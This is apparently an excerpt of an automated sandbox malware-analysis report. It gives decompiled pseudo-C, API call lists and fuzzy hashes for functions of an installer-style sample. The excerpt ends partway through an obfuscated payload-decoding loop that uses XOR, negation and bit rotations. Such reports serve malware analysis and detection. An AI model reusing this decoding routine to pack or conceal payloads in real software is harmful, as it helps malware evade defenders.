                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                                  • GetWindowRect.USER32 ref: 00405274
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                  • SendMessageA.USER32 ref: 004052D3
                                                  • OpenClipboard.USER32(00000000), ref: 004052E3
                                                  • EmptyClipboard.USER32 ref: 004052E9
                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                  • GlobalLock.KERNEL32 ref: 004052FC
                                                  • SendMessageA.USER32 ref: 00405310
                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                  • SetClipboardData.USER32 ref: 00405333
                                                  • CloseClipboard.USER32 ref: 00405339
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                  • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                  • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                  • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404292, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 273stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x526e38
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x520d18
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                  0x00404292
                                                  0x00404298
                                                  0x0040429e
                                                  0x004042ab
                                                  0x004042b9
                                                  0x004042bc
                                                  0x004042c4
                                                  0x004042ca
                                                  0x004042ca
                                                  0x004042d6
                                                  0x004042d9
                                                  0x00404347
                                                  0x0040434e
                                                  0x00404425
                                                  0x0040442c
                                                  0x0040443b
                                                  0x0040443b
                                                  0x0040443f
                                                  0x00404449
                                                  0x00404456
                                                  0x00404458
                                                  0x00404458
                                                  0x00404466
                                                  0x0040446d
                                                  0x00404474
                                                  0x00404477
                                                  0x004044ae
                                                  0x004044b0
                                                  0x004044b6
                                                  0x004044bb
                                                  0x004044bf
                                                  0x004044c1
                                                  0x004044c1
                                                  0x004044dd
                                                  0x00000000
                                                  0x004044df
                                                  0x004044e2
                                                  0x004044f0
                                                  0x004044f6
                                                  0x004044f7
                                                  0x004044fa
                                                  0x004044fd
                                                  0x00000000
                                                  0x004044fd
                                                  0x00404479
                                                  0x0040447b
                                                  0x0040447f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404481
                                                  0x00404481
                                                  0x0040448e
                                                  0x00404493
                                                  0x00000000
                                                  0x00000000
                                                  0x00404497
                                                  0x00404499
                                                  0x00404499
                                                  0x004044a4
                                                  0x004044a7
                                                  0x004044ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004044ac
                                                  0x00404509
                                                  0x00404513
                                                  0x00404516
                                                  0x00404519
                                                  0x00404520
                                                  0x00404520
                                                  0x00404522
                                                  0x00404522
                                                  0x00404527
                                                  0x00404529
                                                  0x00404531
                                                  0x00404538
                                                  0x0040453a
                                                  0x00404545
                                                  0x00404545
                                                  0x0040453a
                                                  0x0040454c
                                                  0x00404555
                                                  0x0040455f
                                                  0x00404567
                                                  0x00404582
                                                  0x00404569
                                                  0x00404572
                                                  0x00404572
                                                  0x00404567
                                                  0x00404587
                                                  0x0040458c
                                                  0x00404591
                                                  0x0040459a
                                                  0x0040459a
                                                  0x004045a3
                                                  0x004045a5
                                                  0x004045a5
                                                  0x004045b1
                                                  0x004045b9
                                                  0x004045c3
                                                  0x004045c3
                                                  0x004045c8
                                                  0x00000000
                                                  0x004045c8
                                                  0x00404477
                                                  0x0040442e
                                                  0x00404435
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404435
                                                  0x00404354
                                                  0x0040435d
                                                  0x00404377
                                                  0x0040437c
                                                  0x00404386
                                                  0x0040438d
                                                  0x00404399
                                                  0x0040439c
                                                  0x0040439f
                                                  0x004043a6
                                                  0x004043ae
                                                  0x004043b1
                                                  0x004043b5
                                                  0x004043bc
                                                  0x004043c4
                                                  0x0040441e
                                                  0x004043c6
                                                  0x004043c7
                                                  0x004043ce
                                                  0x004043d3
                                                  0x004043d8
                                                  0x004043e0
                                                  0x004043ed
                                                  0x00404401
                                                  0x00404405
                                                  0x00404405
                                                  0x00404401
                                                  0x0040440a
                                                  0x00404417
                                                  0x00404417
                                                  0x004043c4
                                                  0x00000000
                                                  0x0040437c
                                                  0x0040436a
                                                  0x00000000
                                                  0x00000000
                                                  0x00404370
                                                  0x00000000
                                                  0x004042db
                                                  0x004042e8
                                                  0x004042f1
                                                  0x004042fe
                                                  0x004042fe
                                                  0x00404305
                                                  0x0040430b
                                                  0x00404314
                                                  0x00404317
                                                  0x0040431a
                                                  0x00404322
                                                  0x00404325
                                                  0x00404328
                                                  0x0040432e
                                                  0x00404335
                                                  0x0040433c
                                                  0x004045ce
                                                  0x004045e0
                                                  0x00404342
                                                  0x00404345
                                                  0x00000000
                                                  0x00404345
                                                  0x0040433c

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                  • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                  • lstrcmpiA.KERNEL32(ksurfviwic,00420538,00000000,?,?), ref: 004043F9
                                                  • lstrcatA.KERNEL32(?,ksurfviwic), ref: 00404405
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                                    • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E52
                                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E5F
                                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E64
                                                    • Part of subcall function 00405DFA: CharPrevA.USER32(?,?), ref: 00405E74
                                                  • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                  • MulDiv.KERNEL32 ref: 004044F0
                                                    • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                    • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                    • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: 8nR$A$C:\Users\user\AppData\Local\Temp$ksurfviwic
                                                  • API String ID: 2624150263-3293981428
                                                  • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                  • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                  • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                  • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                  0x0040205c
                                                  0x00402066
                                                  0x0040206f
                                                  0x00402079
                                                  0x00402082
                                                  0x0040208c
                                                  0x00402090
                                                  0x00402090
                                                  0x00402095
                                                  0x004020a6
                                                  0x004020ae
                                                  0x0040218e
                                                  0x0040218e
                                                  0x00402195
                                                  0x004020b4
                                                  0x004020b4
                                                  0x004020c5
                                                  0x004020c9
                                                  0x004020cf
                                                  0x004020d9
                                                  0x004020db
                                                  0x004020e6
                                                  0x004020e9
                                                  0x004020f6
                                                  0x004020f8
                                                  0x004020fa
                                                  0x00402101
                                                  0x00402104
                                                  0x00402104
                                                  0x00402107
                                                  0x00402111
                                                  0x00402119
                                                  0x0040211e
                                                  0x0040212a
                                                  0x0040212a
                                                  0x0040212d
                                                  0x00402136
                                                  0x00402139
                                                  0x00402142
                                                  0x00402147
                                                  0x00402159
                                                  0x00402168
                                                  0x0040216a
                                                  0x00402176
                                                  0x00402176
                                                  0x00402168
                                                  0x00402178
                                                  0x0040217e
                                                  0x0040217e
                                                  0x00402181
                                                  0x00402187
                                                  0x0040218c
                                                  0x004021a1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040218c
                                                  0x00402197
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?), ref: 004020A6
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 123533781-2935972921
                                                  • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                  • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                  • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                  • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73058D72, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E73058D72(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                  0x73058d77
                                                  0x73058d87

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 73058D77
                                                  • UnhandledExceptionFilter.KERNEL32(7305B78F), ref: 73058D80
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 40620f9eb2ef715374fcdf903018424e86a17b97d0655d4cdca1c52d2c289e5c
                                                  • Instruction ID: 32de08e09792f0d82bee2fa316b4c82c36d3de33710e05f68781cd533ce67738
                                                  • Opcode Fuzzy Hash: 40620f9eb2ef715374fcdf903018424e86a17b97d0655d4cdca1c52d2c289e5c
                                                  • Instruction Fuzzy Hash: C5B09232048648FFEF843B93D809B883F2CEB04662F100011F60DC80558BA254509A91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                  0x00402689
                                                  0x0040269d
                                                  0x004026a8
                                                  0x004026a9
                                                  0x004027e4
                                                  0x0040268b
                                                  0x0040268b
                                                  0x0040268d
                                                  0x0040268f
                                                  0x0040268f
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                  • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                  • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                  • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73066A2B, Relevance: .2, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad2cf0b36354950776b2d4e1d6f2ddca3331e57131929d660ad97237760ffafa
                                                  • Instruction ID: e891c4239cb4edf6e89e3f7bd8601483ef4ab336ef2b9724dbc9b4d31dca14ab
                                                  • Opcode Fuzzy Hash: ad2cf0b36354950776b2d4e1d6f2ddca3331e57131929d660ad97237760ffafa
                                                  • Instruction Fuzzy Hash: 26B11714C5D2EDADCB06CBF984647FCBFB05E2A112F4845C6E4E5A6243C53A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73066A3A, Relevance: .2, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1713aa65249718d7a087bf8b58056b196ed04410e288004b2f98798bd250bee
                                                  • Instruction ID: ee3fe5daffe00ea36117407683804d7a71e43d9684d49dc8c2c84b0e6cc39240
                                                  • Opcode Fuzzy Hash: e1713aa65249718d7a087bf8b58056b196ed04410e288004b2f98798bd250bee
                                                  • Instruction Fuzzy Hash: 96B10214C5D2EDADCB06CBF984647ECBFB05D2A102F4845CAE4E5E6243C13A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 730559D4, Relevance: .2, Instructions: 150memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E730559D4() {
				void* _t221;

				L0:
				while(1) {
					L0:
					 *(_t221 - 8) =  *(_t221 - 8) + 1;
					L1:
					if( *(_t221 - 8) < 0x131b) {
						L2:
						_t5 =  &E73066000 +  *(_t221 - 8); // 0xfffffd00
						 *(_t221 - 1) =  *_t5;
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^ 0x00000044;
						 *(_t221 - 1) =  ~( *(_t221 - 1) & 0x000000ff);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t221 - 1) & 0x000000ff) << 0x00000003;
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) -  *(_t221 - 8);
						 *(_t221 - 1) =  ~( *(_t221 - 1) & 0x000000ff);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) + 0xd6;
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) +  *(_t221 - 8);
						 *(_t221 - 1) =  !( *(_t221 - 1) & 0x000000ff);
						 *(_t221 - 1) =  *(_t221 - 1) & 0x000000ff ^  *(_t221 - 8);
						 *(_t221 - 1) = ( *(_t221 - 1) & 0x000000ff) +  *(_t221 - 8);
						 *(_t221 - 1) =  !( *(_t221 - 1) & 0x000000ff);
